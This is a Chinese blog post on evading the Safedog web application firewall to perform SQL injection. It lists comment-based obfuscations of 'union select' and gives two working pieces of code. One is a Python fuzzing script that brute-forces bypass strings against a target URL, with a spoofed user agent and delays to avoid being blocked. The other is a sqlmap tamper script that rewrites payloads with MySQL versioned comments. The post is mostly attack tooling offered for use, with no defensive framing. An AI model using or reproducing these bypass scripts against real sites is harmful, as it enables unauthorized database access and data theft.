0x01:过程

union与select 两位小家伙跟safedog的爱恨情仇

1.png

1、内联注释  /**/

2.png
正常响应

2、注释+特殊符号 /*特殊符号*/

3.png
正常响应

3、注释+特殊符号+字母+数字 /*特殊符号+数字+字母*/

4.png
正常响应

4、多层套用

例子:/*!unoin/*/*/*/**/*select*/

5.png

0x02:FUZZ脚本编写

注:随机伪造UA头,每次请求都使用随机生成的UA头。为了减少复杂度,随机生成UA头的功能可以通过第三方模块库fake-useragent实现,可以使用pip进行快速安装。

pip install fake-useragent

6.png

# ! -*- encoding:utf-8 -*-
#The author:@Jaky

import requests,time
def Jaky(url_start):
fuzz_aa = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00']
fuzz_bb = ['', ' ']
fuzz_cc = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"]
fuzz = fuzz_aa + fuzz_bb + fuzz_cc
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25"
}#也可以采用随机头,过狗更放心

for a in fuzz:
  for b in fuzz:
      for c in fuzz:
          for d in fuzz:
              exp = "/*!union" + a + b + c + d + "select*/ 1,2,3"
              url = url_start + exp
              res = requests.get(url=url, headers=headers)
              time.sleep(2)#延迟2秒,防止被咬
              print("Now URL:" + url)
              if "技术支持" in res.text: #检测关键词需要自行修改
                  print("Find Fuzz bypass:" + url)
                      
if __name__ == '__main__':
Jaky("http://www.xxx.cn/article/article.php?id=4")

这里我只采用了简单的5层套用。应该是够用了。

0x03:Tamper脚本编写

#!/usr/bin/env python
#Author:Jaky

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
import os

__priority__ = PRIORITY.LOW

def dependencies():
singleTimeWarnMessage("Jaky_Bypass_safedog '%s' is %s" %  (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):
payload=payload.replace('AND','/*!53203520AND*/')
payload=payload.replace('ORDER','/*!53203520order*/')
payload=payload.replace("SELECT","/*!53203520select")
payload=payload.replace('USER())','hex(user/**/()))')
payload=payload.replace('SESSION_USER()','hex(SESSION_USER(-- B%0a))')
payload=payload.replace('UNION ALL SELECT','union/*!53203520/**/select*/')
return payload

这里我采用符号+数字的绕过方式
脚本简单
因需自行修改
记得Sqlmap加延迟3秒或者以上,防止被咬。

标签: 从bypass safedog到Tamper的编写

添加新评论